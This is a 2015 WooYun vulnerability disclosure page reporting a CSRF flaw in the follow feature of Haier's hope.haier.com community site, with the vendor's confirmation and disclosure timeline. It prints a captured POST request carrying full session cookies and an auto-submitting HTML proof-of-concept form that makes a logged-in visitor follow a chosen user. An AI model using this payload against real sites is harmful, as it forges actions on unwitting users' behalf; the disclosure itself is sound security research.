当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089659

漏洞标题:海尔集团某处CSRF刷关注

相关厂商:海尔集团

漏洞作者: Summer

提交时间:2015-01-04 13:07

修复时间:2015-02-18 13:08

公开时间:2015-02-18 13:08

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-04: 细节已通知厂商并且等待厂商处理中
2015-01-05: 厂商已经确认,细节仅向厂商公开
2015-01-15: 细节向核心白帽子及相关领域专家公开
2015-01-25: 细节向普通白帽子公开
2015-02-04: 细节向实习白帽子公开
2015-02-18: 细节向公众公开

简要描述:

一只沉睡的狮子

详细说明:

http://hope.haier.com/
问题出现在关注上 没有任何限制 可导致CSRF问题的发生
http://hope.haier.com/topic/other/topicBoddys

POST /topic/other/topicBoddys HTTP/1.1
Host: hope.haier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://hope.haier.com/group/group/detail/id/280.html
Content-Length: 18
Cookie: hope_lang=cn; PHPSESSID=t18mimkfk1nu2q1jp5bpm8auj2; Hm_lvt_1f3b513b6138cd211c24da6734bf74e9=1420119608; Hm_lpvt_1f3b513b6138cd211c24da6734bf74e9=1420120139; ZXKJSESSIONID=857c2ccb-adf8-0b9c-2df4-061a1dee8075***1; UniqueName=857c2ccb-adf8-0b9c-2df4-061a1dee8075; trsidsssosessionid=7119059F52694E98D4BE2296864BCB08-10.159.63.81; __utma=96306309.1406874401.1420119880.1420119880.1420119880.1; __utmb=96306309.5.10.1420119880; __utmc=96306309; __utmz=96306309.1420119880.1.1.utmcsr=hope.haier.com|utmccn=(referral)|utmcmd=referral|utmcct=/group/group/detail/id/280; __utmt=1; _acxm=d2a49033-763e-430f-867a-21ad08edf549; _gscu_1690714239=20119879h79bx040; _gscs_1690714239=201198792nmr4g40|pv:5; _gscbrs_1690714239=1; _gscu_345248242=20119879kqp7hu40; _gscs_345248242=20119879oi2izo40|pv:5; _gscbrs_345248242=1; SummerSummer321djs=120; idsALInfo=f20ea47283ea0da8bf54c69ae1ba2c3f13dbd828727f4349aa717db8735e32d581cce431a65c4aaee5879b7cf35d3928be92885d156d0503b7ae719d7a5b56e6b7e1c4ed248b497ba22184fd44ab3bb81b0527980a13a3edecb0aee7da97f163_1d1cb40960053ab00945ab793cceaacc; idsALUserSource=""; trsidssdssotoken=7119059F52694E98D4BE2296864BCB08-10.159.63.81_1420163180145; haieruser=SummerSummer321; haierbbsuser=SummerSummer321; bdshare_firstime=1420120043951
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
to_user_id=1600655

漏洞证明:

POC:

<html>
<body>
<form id="demo" name="demo" action="http://hope.haier.com/topic/other/topicBoddys" method="POST">
<input type="text" name="to_user_id" value="1600655" />
<input type="submit" value="submit" />
</form>
<script>
	document.demo.submit();
</script>
</body>
</html>


1.jpg


2.jpg

修复方案:

版权声明:转载请注明来源 Summer@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-01-05 17:41

厂商回复:

感谢乌云平台Summer的测试与提醒,我方已安排人员进行处理。

最新状态:

暂无